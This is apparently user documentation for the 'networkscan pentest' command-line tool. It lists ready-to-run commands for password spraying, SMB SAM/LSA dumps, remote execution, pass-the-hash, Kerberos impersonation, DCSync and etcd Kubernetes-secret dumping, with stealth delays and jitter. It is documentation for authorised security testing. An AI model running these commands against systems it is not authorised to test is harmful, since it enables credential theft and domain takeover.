Skip to content

Pentest#

The networkscan pentest command provides comprehensive penetration testing capabilities against network services, including credential spraying and service-specific attacks.

Usage#

networkscan pentest [command]

Available Commands#

  • spray password: Password spray authentication attacks across network services
  • spray username: Username enumeration against network services
  • service smb: SMB service pentesting
  • service ssh: SSH service pentesting
  • service telnet: Telnet service pentesting
  • service ldap: LDAP service pentesting and domain enumeration
  • service msrpc: MSRPC service pentesting
  • service kerberos: Kerberos service attacks
  • service winrm: WinRM service pentesting
  • service ftp: FTP service pentesting
  • service oracle: Oracle Database (TNS) pentesting
  • scan cve: CVE scanning using nuclei templates

Commands#

Spray Commands#

The spray commands perform credential spraying attacks and username enumeration against network services.

Password Spray#

Perform password spraying attacks against specified targets and services.

Usage#
networkscan pentest spray password --targets 192.168.1.100:445 --service SMB --usernames admin,user --passwords Password123,123456
Supported Services#
  • SSH - Secure Shell protocol
  • SMB - Server Message Block protocol
  • TELNET - Telnet protocol
  • FTP - File Transfer Protocol
  • LDAP - Lightweight Directory Access Protocol
  • KERBEROS - Kerberos authentication protocol
  • MYSQL - MySQL database protocol
  • ORACLE - Oracle Database (TNS) protocol
Key Flags#
  • --targets / -t - Target hosts (IP:port or IP for default port) (required)
  • --service / -s - Target service (required)
  • --usernames / -u - Usernames to spray
  • --passwords / -p - Passwords to spray
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --username-lists - Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
  • --password-lists - Built-in password lists (SYSTEM_PASSWORDS, DOMAIN_PASSWORDS, SERVICE_PASSWORDS)
  • --domain / -d - Domain for SMB/LDAP/KERBEROS authentication
  • --ntlm-hashes - NTLM hashes for pass-the-hash authentication (32 hex chars each)
  • --timeout - Connection timeout in milliseconds (default: 5000)
  • --sleep - Delay between password attempts in seconds
  • --jitter - Random jitter percentage (0-100) to apply to sleep delays
  • --max-attempts - Maximum number of attempts to make (0 = unlimited)
  • --stop-on-first-success - Stop after first successful authentication
  • --successful-only - Only show successful authentications in output
Help Text#
networkscan pentest spray password -h
Perform password spraying attacks against specified targets and services.

Usage:
  networkscan pentest spray password [flags]

Flags:
  -h, --help                         help for password
  -t, --targets strings              Target hosts (IP:port or IP for default port)
  -s, --service string               Target service (SSH, SMB, TELNET, FTP, LDAP, KERBEROS)
  -u, --usernames strings            Usernames to spray
  -p, --passwords strings            Passwords to spray
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
      --username-lists strings       Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
      --password-lists strings       Built-in password lists (SYSTEM_PASSWORDS, DOMAIN_PASSWORDS, SERVICE_PASSWORDS)
  -d, --domain string                Domain for SMB/LDAP/KERBEROS authentication
      --local-auth                   Force authentication against local account instead of domain
      --ntlm-hashes strings          NTLM hashes for pass-the-hash authentication (32 hex chars each)
      --timeout int                  Connection timeout in milliseconds (default 5000)
      --sleep int                    Delay between password attempts in seconds (default 0)
      --jitter int                   Random jitter percentage (0-100) to apply to sleep delays (default 0)
      --max-attempts int             Maximum number of attempts to make (0 = unlimited) (default 0)
      --stop-on-first-success        Stop after first successful authentication
      --successful-only              Only show successful authentications in output

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Username Spray#

Perform username enumeration against specified targets and services.

Usage#
networkscan pentest spray username --targets dc.example.com:88 --service KERBEROS --domain EXAMPLE.COM --usernames admin,guest
Key Flags#
  • --targets / -t - Target hosts (IP:port or IP for default port) (required)
  • --service / -s - Target service (currently only KERBEROS supported) (required)
  • --domain / -d - Domain for Kerberos authentication (required)
  • --usernames / -u - Usernames to enumerate
  • --username-file - File containing usernames (one per line)
  • --username-lists - Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
  • --username-scheme - Generate usernames using scheme (FLAST, FIRST_DOT_LAST, FIRSTLAST, LASTFIRST, FIRST, LAST, F_LAST, FIRST_LAST)
  • --timeout - Connection timeout in milliseconds (default: 5000)
  • --sleep - Delay between username attempts in seconds
  • --jitter - Random jitter percentage (0-100) to apply to sleep delays
  • --max-attempts - Maximum number of attempts to make (0 = unlimited)
  • --successful-only - Only show successful username enumerations in output
Help Text#
networkscan pentest spray username -h
Perform username enumeration against specified targets and services.

Usage:
  networkscan pentest spray username [flags]

Flags:
  -h, --help                         help for username
  -t, --targets strings              Target hosts (IP:port or IP for default port)
  -s, --service string               Target service (currently only KERBEROS supported)
  -u, --usernames strings            Usernames to enumerate
      --username-file string         File containing usernames (one per line)
      --username-lists strings       Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
      --username-scheme string       Generate usernames using scheme (FLAST, FIRST_DOT_LAST, FIRSTLAST, LASTFIRST, FIRST, LAST, F_LAST, FIRST_LAST)
  -d, --domain string                Domain for Kerberos authentication
      --timeout int                  Connection timeout in milliseconds (default 5000)
      --sleep int                    Delay between username attempts in seconds (default 0)
      --jitter int                   Random jitter percentage (0-100) to apply to sleep delays (default 0)
      --max-attempts int             Maximum number of attempts to make (0 = unlimited) (default 0)
      --successful-only              Only show successful username enumerations in output

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Service Commands#

The service commands perform service-specific penetration testing operations against network services.

SMB#

Perform pentest operations against SMB services including authentication testing, command execution, share enumeration, and file downloads.

Usage#
networkscan pentest service smb --targets 192.168.1.100:445 --usernames admin,user --passwords password,123456 --actions AUTH,SHARES_MAP
Available Actions#

Use the --actions flag to specify what operations to perform. Available actions: PROBE, AUTH, SAMDUMP, LSADUMP, SHARES_MAP, SHARE_DOWNLOAD, EXEC. Base enumeration is always performed.

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform (see available actions)
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --credentials - Credentials in user:pass format
  • --domain / -d - Domain for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --local-auth - Force authentication against local account instead of domain
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --remote-file-path - Remote file path to download (format: SHARE\path\to\file)
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-on-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
  • --verbose - Enable verbose output
Help Text#
networkscan pentest service smb -h
Perform pentest operations against SMB services.

Usage:
  networkscan pentest service smb [flags]

Flags:
  -h, --help                         help for smb
      --targets strings              Target hosts
      --actions strings              Actions to perform: PROBE,AUTH,SAMDUMP,LSADUMP,SHARES_MAP,SHARE_DOWNLOAD,EXEC
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
      --credentials string           Credentials in user:pass format
  -d, --domain string                Domain for authentication
      --ntlm-hash string             NTLM hash for pass-the-hash authentication
      --local-auth                   Force authentication against local account instead of domain
  -x, --execute strings              Commands to execute on successful auth
      --command-file string          File containing commands to execute
      --remote-file-path string      Remote file path to download (format: SHARE\path\to\file)
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results
      --verbose                      Verbose output

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

SSH#

Perform pentest operations against SSH services including authentication testing, command execution, and file transfers.

Usage#
networkscan pentest service ssh --targets 192.168.1.100:22 --usernames root,admin --passwords password,123456 --actions AUTH,EXEC
Available Actions#

Available actions: AUTH, EXEC, FILE_TRANSFER

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: AUTH, EXEC, FILE_TRANSFER
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --key-file - SSH private key file
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --upload - Files to upload (local:remote format)
  • --download - Remote files to download
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
Help Text#
networkscan pentest service ssh -h
Perform pentest operations against SSH services.

Usage:
  networkscan pentest service ssh [flags]

Flags:
  -h, --help                         help for ssh
      --targets strings              Target hosts
      --actions strings              Actions to perform: AUTH,EXEC,FILE_TRANSFER
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
      --key-file string              SSH private key file
  -x, --execute strings              Commands to execute on successful auth
      --command-file string          File containing commands to execute
      --upload strings               Files to upload (local:remote format)
      --download strings             Remote files to download
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Telnet#

Perform pentest operations against Telnet services including authentication testing and command execution.

Usage#
networkscan pentest service telnet --targets 192.168.1.100:23 --usernames admin --passwords password --actions AUTH
Available Actions#

Available actions: AUTH

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: AUTH
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
Help Text#
networkscan pentest service telnet -h
Perform pentest operations against Telnet services.

Usage:
  networkscan pentest service telnet [flags]

Flags:
  -h, --help                         help for telnet
      --targets strings              Target hosts
      --actions strings              Actions to perform: AUTH
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
  -x, --execute strings              Commands to execute on successful auth
      --command-file string          File containing commands to execute
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

LDAP#

Perform pentest operations against LDAP services including authentication testing and domain enumeration.

Usage#
networkscan pentest service ldap --targets 192.168.1.10:389 --usernames user --passwords pass --domain EXAMPLE.COM --actions AUTH,DOMAINDUMP
Available Actions#

Available actions: PROBE, AUTH, DOMAINDUMP

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: PROBE, AUTH, DOMAINDUMP
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --credentials - Credentials in user:pass format
  • --domain / -d - Domain for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --local-auth - Force authentication against local account instead of domain
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
  • --sleep - Delay in seconds between LDAP queries for stealth mode
  • --jitter - Jitter percentage (0-100) to randomize sleep delays
  • --max-queries - Maximum total LDAP queries to perform (0 = unlimited)
  • --minimal-queries - Use minimal query sets and essential attributes only
  • --collection-methods - Collection methods for domain dump (GROUP, TRUSTS, OBJECTPROPS, CONTAINER, LOCAL_ADMIN) (default: GROUP,CONTAINER,TRUSTS)
Help Text#
networkscan pentest service ldap -h
Perform pentest operations against LDAP services.

Usage:
  networkscan pentest service ldap [flags]

Flags:
  -h, --help                         help for ldap
      --targets strings              Target hosts
      --actions strings              Actions to perform: PROBE,AUTH,DOMAINDUMP
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
      --credentials string           Credentials in user:pass format
  -d, --domain string                Domain for authentication
      --ntlm-hash string             NTLM hash for pass-the-hash authentication
      --local-auth                   Force authentication against local account instead of domain
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results
      --sleep int                    Delay in seconds between LDAP queries for stealth mode (default 0)
      --jitter int                   Jitter percentage (0-100) to randomize sleep delays (default 0)
      --max-queries int              Maximum total LDAP queries to perform (0 = unlimited) (default 0)
      --minimal-queries              Use minimal query sets and essential attributes only
      --collection-methods strings   Collection methods for domain dump (GROUP, TRUSTS, OBJECTPROPS, CONTAINER, LOCAL_ADMIN) (default [GROUP,CONTAINER,TRUSTS])

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

MSRPC#

Perform pentest operations against MS-RPC services including DCSync attacks via DRSUAPI.

Usage#
networkscan pentest service msrpc --targets dc.example.com:445 --usernames admin --passwords Password123 --domain EXAMPLE.COM --actions DCSYNC
Key Flags#
  • --targets - Target hosts (required)
  • --usernames / -u - Username for authentication
  • --passwords / -p - Password for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --kerberos-ticket - Base64-encoded Kerberos ticket (TGS) for ticket-based authentication
  • --domain - Domain name (required for DCSync)
  • --actions - Actions to perform: DCSYNC (required)
  • --timeout - Connection timeout in seconds (default: 10)
Help Text#
networkscan pentest service msrpc -h
Perform pentest operations against MS-RPC services including DCSync attacks via DRSUAPI.

Usage:
  networkscan pentest service msrpc [flags]

Flags:
  -h, --help                         help for msrpc
      --targets strings              Target hosts (required)
  -u, --usernames strings            Username for authentication
  -p, --passwords strings            Password for authentication
      --ntlm-hash string             NTLM hash for pass-the-hash authentication
      --kerberos-ticket string       Base64-encoded Kerberos ticket (TGS) for ticket-based authentication
      --domain string                Domain name (required for DCSync)
      --actions strings              Actions to perform: DCSYNC (required)
      --timeout int                  Connection timeout in seconds (default 10)

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Kerberos#

Perform pentest operations against Kerberos services including advanced attacks such as constrained delegation.

Usage#
networkscan pentest service kerberos --targets dc.example.com:88 --usernames user --passwords pass --domain EXAMPLE.COM --actions SERVICE_TICKET --spn HTTP/server.example.com
Key Flags#
  • --targets - Target domain controllers (DC.domain.com:88) (required)
  • --actions - Actions to perform: SERVICE_TICKET
  • --usernames / -u - Username for authentication
  • --passwords / -p - Password for user
  • --ntlm-hash - NTLM hash for user authentication
  • --domain / -d - Domain name
  • --spn - Target Service Principal Name (e.g., HTTP/server.domain.com)
  • --impersonate - Target user to impersonate (optional, for delegation attacks)
  • --timeout - Connection timeout in milliseconds (default: 5000)
Help Text#
networkscan pentest service kerberos -h
Perform pentest operations against Kerberos services.

Usage:
  networkscan pentest service kerberos [flags]

Flags:
  -h, --help                         help for kerberos
      --targets strings              Target domain controllers (DC.domain.com:88)
      --actions strings              Actions to perform: SERVICE_TICKET
  -u, --usernames strings            Username for authentication
  -p, --passwords strings            Password for user
      --ntlm-hash string             NTLM hash for user authentication
  -d, --domain string                Domain name
      --spn string                   Target Service Principal Name (e.g., HTTP/server.domain.com)
      --impersonate string           Target user to impersonate (optional, for delegation attacks)
      --timeout int                  Connection timeout in milliseconds (default 5000)

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

WinRM#

Perform pentest operations against WinRM services including authentication testing and command execution.

Usage#
networkscan pentest service winrm --targets 192.168.1.100 --usernames admin --passwords Password123 --actions AUTH,EXEC
Available Actions#

Available actions: AUTH, EXEC

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: AUTH, EXEC
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --domain / -d - Domain for authentication
  • --local-auth - Force authentication against local account instead of domain
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --port - WinRM port (default: 5985 for HTTP, 5986 for HTTPS)
  • --https - Use HTTPS instead of HTTP
  • --insecure - Skip TLS certificate verification
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-on-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
Help Text#
networkscan pentest service winrm -h
Perform pentest operations against WinRM services.

Usage:
  networkscan pentest service winrm [flags]

Flags:
  -h, --help                         help for winrm
      --targets strings              Target hosts
      --actions strings              Actions to perform: AUTH,EXEC
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
  -d, --domain string                Domain for authentication
      --local-auth                   Force authentication against local account instead of domain
  -x, --execute strings              Commands to execute on successful auth
      --command-file string          File containing commands to execute
      --port int                     WinRM port (default: 5985 for HTTP, 5986 for HTTPS) (default 0)
      --https                        Use HTTPS instead of HTTP
      --insecure                     Skip TLS certificate verification
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

FTP#

Perform pentest operations against FTP services including directory enumeration, write permission testing, file download, and file upload.

Usage#
networkscan pentest service ftp --targets 192.168.1.100:21 --username anonymous --password "" --actions LIST
Available Actions#

Available actions: LIST, WRITE_TEST, DOWNLOAD, UPLOAD

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: LIST, WRITE_TEST, DOWNLOAD, UPLOAD
  • --username / -u - Username for authentication
  • --password / -p - Password for authentication
  • --list-paths - Directories to list (defaults to landing directory)
  • --recursive - Recursively list subdirectories
  • --max-depth - Max recursion depth for listing (default: 5)
  • --write-test-paths - Directories to test write permissions (defaults to landing directory)
  • --download - Remote file paths to download
  • --max-download-size - Max file size in bytes to download (default: 1048576 / 1MB)
  • --upload-content - Files to upload as remote_path:base64content
  • --max-upload-size - Max file size in bytes to upload (default: 1048576 / 1MB)
  • --timeout - Connection timeout in milliseconds (default: 10000)
Help Text#
networkscan pentest service ftp -h
Perform pentest operations against FTP services.

Usage:
  networkscan pentest service ftp [flags]

Flags:
  -h, --help                         help for ftp
      --targets strings              Target hosts
      --actions strings              Actions to perform: LIST,WRITE_TEST,DOWNLOAD,UPLOAD
  -u, --username string              Username for authentication
  -p, --password string              Password for authentication
      --list-paths strings           Directories to list (defaults to landing directory)
      --recursive                    Recursively list subdirectories
      --max-depth int                Max recursion depth for listing (default 5)
      --write-test-paths strings     Directories to test write permissions (defaults to landing directory)
      --download strings             Remote file paths to download
      --max-download-size int        Max file size in bytes to download (default 1MB) (default 1048576)
      --upload-content strings       Files to upload as remote_path:base64content
      --max-upload-size int          Max file size in bytes to upload (default 1MB) (default 1048576)
      --timeout int                  Connection timeout in milliseconds (default 10000)

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Oracle#

The Oracle pentest command provides TNS listener enumeration, server fingerprinting, credential testing, and authenticated query execution against Oracle Database services.

Usage#
networkscan pentest service oracle [flags]
Available Actions#
Action Auth Required Description
LISTENER No Enumerate TNS listener metadata, SIDs, and services
PROBE No Gather server version and edition without credentials
AUTH No (tests creds) Test credential pairs against the target SID/service
QUERY Yes Run discovery queries after successful authentication
Key Flags#
Flag Description
--targets Target hosts (IP:port or IP, default port 1521)
--actions Actions: LISTENER, PROBE, AUTH, QUERY (default: PROBE)
--sid Oracle SID to connect to
--service-name Oracle service name to connect to
--usernames / -u Usernames for authentication
--passwords / -p Passwords for authentication
--username-file File containing usernames (one per line)
--password-file File containing passwords (one per line)
--timeout Connection timeout in milliseconds (default 10000)
--query-types Query types for QUERY: SESSION_PRIVS, DBA_USERS, ROLE_PRIVS, VERSION, CUSTOM
--custom-query Custom SQL query for QUERY; adds CUSTOM to query types automatically
--allow-mutations Allow DML/DDL custom SQL queries
Help Text#
Perform pentest operations against Oracle Database (TNS) services.

LISTENER enumerates listener metadata, SIDs, and services without authentication.
PROBE gathers server version and edition info without authentication.
AUTH attempts credential authentication against the target.
QUERY runs discovery queries (session privileges, users, roles, version) after successful auth.

Usage:
  networkscan pentest service oracle [flags]

Flags:
      --actions strings        Actions: LISTENER, PROBE, AUTH, QUERY (default: PROBE)
      --allow-mutations        Allow DML/DDL custom SQL queries
      --custom-query string    Custom SQL query for QUERY action
  -h, --help                   help for oracle
  -p, --passwords strings      Passwords for authentication
      --password-file string   File containing passwords (one per line)
      --query-types strings    Oracle query types: SESSION_PRIVS, DBA_USERS, ROLE_PRIVS, VERSION, CUSTOM
      --service-name string    Oracle service name to connect to
      --sid string             Oracle SID to connect to
      --targets strings        Target hosts (IP:port or IP, default port 1521)
      --timeout int            Connection timeout in milliseconds (default 10000)
  -u, --usernames strings      Usernames for authentication
      --username-file string   File containing usernames (one per line)

#### etcd

Perform pentest operations against etcd services. Supports unauthenticated probing, keyspace reads, credential authentication, full key dumps, and Kubernetes Secret decoding.

etcd is the backing store for every Kubernetes cluster. Unauthenticated or default-credential access yields the entire cluster's Secrets (IAM tokens, registry credentials, TLS keys), ConfigMaps, and ServiceAccount bearer tokens — bypassing all Kubernetes RBAC. Kubernetes does not encrypt Secrets at rest by default.

##### Usage
```bash
networkscan pentest service etcd --targets 192.168.1.10:2379 --actions PROBE
networkscan pentest service etcd --targets 192.168.1.10:2379 --actions PROBE,READ_UNAUTH
networkscan pentest service etcd --targets 192.168.1.10:2379 --actions AUTH --usernames root --passwords root,etcd
networkscan pentest service etcd --targets 192.168.1.10:2379 --actions PROBE,READ_UNAUTH,DUMP,K8S_DECODE
Available Actions#
  • PROBE — GET /version, /health, /metrics, /v3/cluster/member/list. Returns server version, cluster version, member list, leader identity, and Kubernetes inference flag.
  • READ_UNAUTH — POST /v3/kv/range with full-keyspace range. Confirms unauthenticated read access (the canonical etcd compromise).
  • AUTH — POST /v3/auth/authenticate with operator-supplied or embedded default credentials (root:root, root:etcd, etc.). Captures JWT bearer token on success.
  • DUMP — Paginated full keyspace dump. Tags entries by prefix (/registry/secrets/, /registry/configmaps/, etc.).
  • K8S_DECODE — Decodes k8s\x00 magic-prefixed entries from the dump into structured Secret, ConfigMap, and ServiceAccount objects. Local-only; no network calls.
Key Flags#
  • --targets - Target hosts (host:port, default port 2379) (required)
  • --actions - Actions to perform: PROBE, READ_UNAUTH, AUTH, DUMP, K8S_DECODE (default: PROBE)
  • --usernames - Usernames for AUTH action (default: root)
  • --passwords - Passwords to try for AUTH action
  • --cluster-endpoints - Override cluster endpoints discovered during PROBE
  • --max-keys - Maximum keys to dump (DUMP action, default: 1000)
  • --key-prefix-filter - Filter dump to keys matching this prefix (e.g. /registry/secrets/)
  • --decode-kubernetes-secrets - Enable K8s Secret decoding in K8S_DECODE action (default: true)
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop AUTH after first successful credential
  • --successful-only - Output only successful AUTH results
Safety Posture#

Read-only by default. PUT, DELETE, COMPACT, DEFRAGMENT, and all auth-mutation endpoints are not implemented. K8S_DECODE is fully local — no additional network calls. DUMP is capped at --max-keys (default 1000) with a truncated flag when the limit is hit.

Help Text#
networkscan pentest service etcd -h
Perform pentest operations against etcd services.

Supports connection probing (PROBE), unauthenticated key reads (READ_UNAUTH),
credential authentication testing (AUTH), full key dump (DUMP), and
Kubernetes secret decoding (K8S_DECODE).

Usage:
  networkscan pentest service etcd [flags]

Flags:
  -h, --help                          help for etcd
      --targets strings               Target hosts (host:port)
      --actions strings               Actions: PROBE,READ_UNAUTH,AUTH,DUMP,K8S_DECODE (default [PROBE])
      --usernames strings             Usernames for AUTH
      --passwords strings             Passwords for AUTH
      --cluster-endpoints strings     Override cluster endpoints
      --max-keys int                  Maximum keys to dump (default 1000)
      --key-prefix-filter string      Filter dump by key prefix
      --decode-kubernetes-secrets     Enable Kubernetes Secret decoding (default true)
      --timeout int                   Connection timeout in milliseconds (default 10000)
      --stop-first-success            Stop after first successful credential
      --successful-only               Output only successful auth results

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Scan Commands#

The scan commands perform vulnerability scanning operations against network targets.

CVE Scan#

Perform CVE scanning against network targets using nuclei templates. Scans network services for known CVE vulnerabilities, with templates filtered by application protocol and optionally by year.

Usage#
networkscan pentest scan cve --targets 192.168.1.100:22 --protocol SSH
networkscan pentest scan cve --targets 192.168.1.100:21 --protocol FTP --years 2023,2024,2025
Key Flags#
  • --targets - Target hosts (IP:port or hostname:port) (required)
  • --protocol - Application protocol to filter templates (e.g., FTP, SSH, HTTP, SMB, RPC, TELNET, REDIS, SLP) (required)
  • --years - Filter CVE templates by year (e.g., 2023,2024,2025) (default: all years 2000-2025)
  • --timeout - Timeout in seconds for each scan (default: 30)
  • --threads - Number of concurrent threads (default: 25)
  • --verbose-logs - Enable verbose logging
  • --global-rate-limit - Global rate limit in requests per second (default: no limit)
Help Text#
networkscan pentest scan cve -h
Perform CVE scanning against network targets using nuclei templates.

Usage:
  networkscan pentest scan cve [flags]

Flags:
  -h, --help                         help for cve
      --targets strings              Target hosts (IP:port or hostname:port)
      --protocol string              Application protocol to filter templates (e.g., FTP, SSH, HTTP, SMB, RPC, TELNET, REDIS, SLP)
      --years strings                Filter CVE templates by year (e.g., 2023,2024,2025) (default [2000,2001,...,2025])
      --timeout int                  Timeout in seconds for each scan (default 30)
      --threads int                  Number of concurrent threads (default 25)
      --verbose-logs                 Enable verbose logging
      --global-rate-limit int        Global rate limit (requests per second, default is no limit) (default 0)

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Examples#

Basic Authentication Testing#

# Test SMB authentication with domain
networkscan pentest service smb --targets server.domain.com:445 --usernames admin --passwords Password123 --domain CORP --actions AUTH

# Test SSH with key-based auth
networkscan pentest service ssh --targets 192.168.1.10:22 --usernames root --key-file ~/.ssh/id_rsa --actions AUTH,EXEC --execute "whoami"

# Test Telnet with wordlists
networkscan pentest service telnet --targets 192.168.1.20:23 --username-file users.txt --password-file passwords.txt --actions AUTH

Password Spraying#

# SMB password spray
networkscan pentest spray password --targets 192.168.1.0/24 --service SMB --usernames admin,guest --passwords Password123,123456 --domain CORP

# Kerberos username enumeration
networkscan pentest spray username --targets dc.example.com:88 --service KERBEROS --domain EXAMPLE.COM --username-lists DOMAIN_USERNAMES

# LDAP password spray with stealth
networkscan pentest spray password --targets ldap.example.com:389 --service LDAP --usernames user1,user2 --passwords pass1,pass2 --domain EXAMPLE --sleep 2 --jitter 10

Advanced Usage#

# SMB with file download
networkscan pentest service smb --targets 192.168.1.100:445 --usernames admin --passwords password --remote-file-path "C$\\Windows\\System32\\drivers\\etc\\hosts"

# LDAP domain dump with stealth
networkscan pentest service ldap --targets dc.example.com:389 --usernames user --passwords pass --domain EXAMPLE.COM --actions AUTH,DOMAINDUMP --sleep 1 --minimal-queries

# Kerberos service ticket with impersonation
networkscan pentest service kerberos --targets dc.example.com:88 --usernames service_account --passwords ServicePass123 --domain EXAMPLE.COM --actions SERVICE_TICKET --spn HTTP/webapp.example.com --impersonate administrator

# DCSync attack
networkscan pentest service msrpc --targets dc.example.com:445 --usernames admin --passwords Password123 --domain EXAMPLE.COM --actions DCSYNC